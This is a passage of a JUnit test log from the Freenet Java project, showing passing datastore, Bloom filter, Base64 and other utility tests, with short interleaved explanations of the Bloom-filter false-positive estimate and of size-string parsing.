    [junit] Successfully closed store testSaltedHashFreenetStoreSSK
    [junit] ------------- ---------------- ---------------
    [junit] ------------- Standard Error -----------------
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreSSK.hd
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreSSK.metadata
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreSSK.config
    [junit] Slot filter (tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreOnCloseSSK.slotfilter) for testSaltedHashFreenetStoreOnCloseSSK is loaded (new=true).
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreOnCloseSSK.metadata
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreOnCloseSSK.config
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreOnCloseSSK.slotfilter
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreOnCloseSSK.hd
    [junit] Slot filter (tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreOnCloseSSK.slotfilter) for testSaltedHashFreenetStoreOnCloseSSK is loaded (new=true).
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreOnCloseSSK.metadata
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreOnCloseSSK.config
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreOnCloseSSK.slotfilter
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreOnCloseSSK.hd
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreCHK.config
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreCHK.metadata
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreCHK.hd
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreSSK.hd
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreSSK.metadata
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreSSK.config
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testOnCollisionsSSK took 10,039 sec
    [junit] Testcase: testSimpleCHK took 1,584 sec
    [junit] Testcase: testSimpleSSK took 0,789 sec
    [junit] Shutting down...
    [junit] Successfully closed store testSaltedHashFreenetStoreOnCloseSSK
    [junit] Successfully closed store testSaltedHashFreenetStoreCHK
    [junit] Successfully closed store testSaltedHashFreenetStoreOnCloseSSK
    [junit] Successfully closed store testSaltedHashFreenetStoreSSK
    [junit] Running freenet.store.saltedhash.SaltedHashSlotFilterTest
    [junit] Testsuite: freenet.store.saltedhash.SaltedHashSlotFilterTest
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter) for testCachingFreenetStoreCHK is loaded (new=true).
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] HmacSHA256: using SunJCE version 1.7
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] OpenJDK 64-Bit Server VM warning: You have loaded library /tmp/jbigi6651877886827377202lib.tmp which might have disabled stack guard. The VM will try to fix the stack guard now.
    [junit] It's highly recommended that you fix the library with 'execstack -c <libfile>', or link it with '-z noexecstack'.
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12048372ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12264320ns
    [junit] Using JCA cipher provider: SunJCE version 1.7
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter) for testCachingFreenetStoreCHK is loaded (new=true).
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.config
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter) for testCachingFreenetStoreCHK is loaded (new=true).
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.config
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter) for testCachingFreenetStoreCHK is loaded (new=true).
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter) for testCachingFreenetStoreCHK is loaded (new=true).
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Rebuilding slot filter because new
    [junit] WrapperManager: Initializing...
    [junit] WrapperManager: WARNING - The wrapper.native_library system property was not
    [junit] WrapperManager:           set. Using the default value, 'wrapper'.
    [junit] testCachingFreenetStoreCHK cleaner in progress: 0/100
    [junit] WrapperManager: WARNING - The version of the Wrapper which launched this JVM is 
    [junit] WrapperManager:           "unknown" while the version of the native library 
    [junit] WrapperManager:           is "3.5.14".
    [junit] WrapperManager:           The Wrapper may appear to work correctly but some features may
    [junit] WrapperManager:           not function correctly.  This configuration has not been tested
    [junit] WrapperManager:           and is not supported.
    [junit] WrapperManager: 
    [junit] testCachingFreenetStoreCHK cleaner finished successfully.
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.config
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter) for testCachingFreenetStoreCHK is loaded (new=true).
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter) for testCachingFreenetStoreCHK is loaded (new=false).
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter) for testCachingFreenetStoreCHK is loaded (new=true).
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter) for testCachingFreenetStoreCHK is loaded (new=false).
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter) for testCachingFreenetStoreCHK is loaded (new=true).
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter) for testCachingFreenetStoreCHK is loaded (new=false).
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter) for testCachingFreenetStoreCHK is loaded (new=true).
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Rebuilding slot filter because new
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.config
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Tests run: 5, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 24,415 sec
    [junit] Tests run: 5, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 24,415 sec
    [junit] ------------- Standard Output ---------------
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] HmacSHA256: using SunJCE version 1.7
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12048372ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12264320ns
    [junit] Using JCA cipher provider: SunJCE version 1.7
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Rebuilding slot filter because new
    [junit] WrapperManager: Initializing...
    [junit] WrapperManager: WARNING - The wrapper.native_library system property was not
    [junit] WrapperManager:           set. Using the default value, 'wrapper'.
    [junit] WrapperManager: WARNING - The version of the Wrapper which launched this JVM is 
    [junit] WrapperManager:           "unknown" while the version of the native library 
    [junit] WrapperManager:           is "3.5.14".
    [junit] WrapperManager:           The Wrapper may appear to work correctly but some features may
    [junit] WrapperManager:           not function correctly.  This configuration has not been tested
    [junit] WrapperManager:           and is not supported.
    [junit] WrapperManager: 
    [junit] testCachingFreenetStoreCHK cleaner finished successfully.
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Rebuilding slot filter because new
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] ------------- ---------------- ---------------
    [junit] ------------- Standard Error -----------------
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter) for testCachingFreenetStoreCHK is loaded (new=true).
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter) for testCachingFreenetStoreCHK is loaded (new=true).
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.config
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter) for testCachingFreenetStoreCHK is loaded (new=true).
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.config
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter) for testCachingFreenetStoreCHK is loaded (new=true).
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter) for testCachingFreenetStoreCHK is loaded (new=true).
    [junit] testCachingFreenetStoreCHK cleaner in progress: 0/100
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter) for testCachingFreenetStoreCHK is loaded (new=true).
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter) for testCachingFreenetStoreCHK is loaded (new=false).
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter) for testCachingFreenetStoreCHK is loaded (new=true).
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter) for testCachingFreenetStoreCHK is loaded (new=false).
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter) for testCachingFreenetStoreCHK is loaded (new=true).
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter) for testCachingFreenetStoreCHK is loaded (new=false).
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter) for testCachingFreenetStoreCHK is loaded (new=true).
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.config
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testCHKPresent took 14,834 sec
    [junit] Testcase: testCHKDelayedTurnOnSlotFiltersWithCleaner took 2,049 sec
    [junit] Testcase: testCHKPresentWithAbort took 3,377 sec
    [junit] Testcase: testCHKPresentWithClose took 2,452 sec
    [junit] Testcase: testCHKDelayedTurnOnSlotFilters took 1,186 sec
    [junit] Shutting down...
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Running freenet.support.Base64Test
    [junit] Testsuite: freenet.support.Base64Test
    [junit] Tests run: 9, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,708 sec
    [junit] Tests run: 9, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,708 sec
    [junit] 
    [junit] Testcase: testIllegalBaseLength took 0,017 sec
    [junit] Testcase: testIllegalBaseCharacter took 0,001 sec
    [junit] Testcase: testDecodeStandard took 0,005 sec
    [junit] Testcase: testEncodeDecode took 0,001 sec
    [junit] Testcase: testEncodeStandard took 0,005 sec
    [junit] Testcase: testDecode took 0,001 sec
    [junit] Testcase: testEncode took 0,001 sec
    [junit] Testcase: testRandom took 1,116 sec
    [junit] Testcase: testEncodePadding took 0,001 sec
    [junit] Running freenet.support.BitArrayTest
    [junit] Testsuite: freenet.support.BitArrayTest
    [junit] Tests run: 11, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,503 sec
    [junit] Tests run: 11, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,503 sec
    [junit] 
    [junit] Testcase: testShrinkGrow took 0,008 sec
    [junit] Testcase: testSetAndGetBit took 0,001 sec
    [junit] Testcase: testUnsignedByteToInt took 0,004 sec
    [junit] Testcase: testToStringEmpty took 0,001 sec
    [junit] Testcase: testGetSize took 0 sec
    [junit] Testcase: testLastOne took 0,001 sec
    [junit] Testcase: testFirstOne took 0,001 sec
    [junit] Testcase: testSetBit_OutOfBounds took 0,001 sec
    [junit] Testcase: testBitArray_int took 0 sec
    [junit] Testcase: testToStringAllEquals took 0,002 sec
    [junit] Testcase: testSetAllOnes took 0 sec
    [junit] Running freenet.support.BloomFilterTest
    [junit] Testsuite: freenet.support.BloomFilterTest
    [junit] ---freenet.support.CountingBloomFilter@6a790e37---
    [junit]           k = 1
    [junit]           q = 0.3935063648773005
    [junit]           p = 0.3935063648773005
    [junit]       limit = 0.41330375343366554
    [junit]      actual = 0.38916015625
    [junit]  actual / p = 0.9889551757856427
    [junit] ---freenet.support.BinaryBloomFilter@7a631c70---
    [junit]           k = 1
    [junit]           q = 0.3935063648773005
    [junit]           p = 0.3935063648773005
    [junit]       limit = 0.41330375343366554
    [junit]      actual = 0.38916015625
    [junit]  actual / p = 0.9889551757856427
    [junit] Tests run: 5, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 6,65 sec
    [junit] Tests run: 5, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 6,65 sec
    [junit] ------------- Standard Output ---------------
    [junit] ---freenet.support.CountingBloomFilter@6a790e37---
    [junit]           k = 1
    [junit]           q = 0.3935063648773005
    [junit]           p = 0.3935063648773005
    [junit]       limit = 0.41330375343366554
    [junit]      actual = 0.38916015625
    [junit]  actual / p = 0.9889551757856427
    [junit] ---freenet.support.BinaryBloomFilter@7a631c70---
    [junit]           k = 1
    [junit]           q = 0.3935063648773005
    [junit]           p = 0.3935063648773005
    [junit]       limit = 0.41330375343366554
    [junit]      actual = 0.38916015625
    [junit]  actual / p = 0.9889551757856427
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testCountingFilterRemove took 3,704 sec
    [junit] Testcase: testBinaryFilterPositive took 0,159 sec
    [junit] Testcase: testCountingFilterFalsePositive took 0,922 sec
    [junit] Testcase: testCountingFilterPositive took 0,032 sec
    [junit] Testcase: testBinaryFilterFalsePositive took 1,279 sec
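The k/q/p/limit/actual block printed by BloomFilterTest is the usual false-positive estimate for a Bloom filter: with k hash functions, n inserted keys and m bits, the expected false-positive rate is roughly (1 - e^(-k*n/m))^k. With k = 1 and a fill ratio of n/m = 0.5 that comes out at about 0.3935, which lines up with the q and p values above, while "actual" is the rate the test measured empirically. A minimal sketch of that formula (hypothetical helper, not freenet code):

    // Hypothetical helper, not part of the freenet sources: the textbook
    // Bloom-filter false-positive estimate p = (1 - e^(-k*n/m))^k.
    public final class BloomMath {
        static double expectedFalsePositiveRate(int k, long n, long m) {
            return Math.pow(1.0 - Math.exp(-(double) k * n / m), k);
        }

        public static void main(String[] args) {
            // k = 1, n/m = 0.5 gives roughly 0.3935, in line with the p printed above.
            System.out.println(expectedFalsePositiveRate(1, 1024, 2048));
        }
    }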
    [junit] Running freenet.support.BufferTest
    [junit] Testsuite: freenet.support.BufferTest
    [junit] Tests run: 8, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,543 sec
    [junit] Tests run: 8, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,543 sec
    [junit] 
    [junit] Testcase: testDataInputStreamBuffer took 0,01 sec
    [junit] Testcase: testByteArrayBuffer took 0,003 sec
    [junit] Testcase: testCopy took 0,002 sec
    [junit] Testcase: testByteArrayIndexBuffer took 0,001 sec
    [junit] Testcase: testHashcode took 0,062 sec
    [junit] Testcase: testLongBufferToString took 0,001 sec
    [junit] Testcase: testEquals took 0,001 sec
    [junit] Testcase: testBadLength took 0 sec
    [junit] Running freenet.support.ByteArrayWrapperTest
    [junit] Testsuite: freenet.support.ByteArrayWrapperTest
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,506 sec
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,506 sec
    [junit] 
    [junit] Testcase: testWrapper took 0,074 sec
    [junit] Running freenet.support.ByteBufferInputStreamTest
    [junit] Testsuite: freenet.support.ByteBufferInputStreamTest
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,456 sec
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,456 sec
    [junit] 
    [junit] Testcase: testUnsignedRead took 0,013 sec
    [junit] Running freenet.support.DoublyLinkedListImplTest
    [junit] Testsuite: freenet.support.DoublyLinkedListImplTest
    [junit] Tests run: 10, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,628 sec
    [junit] Tests run: 10, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,628 sec
    [junit] 
    [junit] Testcase: testIternator took 0,032 sec
    [junit] Testcase: testPopN took 0,001 sec
    [junit] Testcase: testClearSize took 0,001 sec
    [junit] Testcase: testHeadTail took 0 sec
    [junit] Testcase: testRandomRemovePush took 0 sec
    [junit] Testcase: testForwardShiftUnshift took 0,001 sec
    [junit] Testcase: testRandomInsert took 0,003 sec
    [junit] Testcase: testForwardPushPop took 0 sec
    [junit] Testcase: testRandomShiftPush took 0 sec
    [junit] Testcase: testShiftN took 0 sec
    [junit] Running freenet.support.FieldTrimSecondTest
    [junit] Testsuite: freenet.support.FieldTrimSecondTest
    [junit] Input: 50 KiB/s Parsed: 51200   Intended: 51200
    [junit] Input: 1.5 MiB/sec  Parsed: 1572864 Intended: 1572864
    [junit] Input: 128 kbps Parsed: 128000  Intended: 128000
    [junit] Input: 20 KiB   Parsed: 20480   Intended: 20480
    [junit] Input: 5800 Parsed: 5800    Intended: 5800
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,635 sec
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,635 sec
    [junit] ------------- Standard Output ---------------
    [junit] Input: 50 KiB/s Parsed: 51200   Intended: 51200
    [junit] Input: 1.5 MiB/sec  Parsed: 1572864 Intended: 1572864
    [junit] Input: 128 kbps Parsed: 128000  Intended: 128000
    [junit] Input: 20 KiB   Parsed: 20480   Intended: 20480
    [junit] Input: 5800 Parsed: 5800    Intended: 5800
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: test took 1,133 sec
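The Input/Parsed/Intended lines above show how FieldTrimSecondTest expects size and bandwidth strings to be turned into plain numbers: the binary prefixes Ki and Mi stand for 1024 and 1024², a bare k is read as decimal 1000, and a unit-less value is taken as-is. The arithmetic, as an illustration only (not freenet's actual parser):

    // Illustration only (not freenet's Fields parser): the arithmetic behind
    // the Parsed values shown above.
    public final class TrimArithmetic {
        public static void main(String[] args) {
            System.out.println(50L * 1024);                 // "50 KiB/s"    -> 51200
            System.out.println((long) (1.5 * 1024 * 1024)); // "1.5 MiB/sec" -> 1572864
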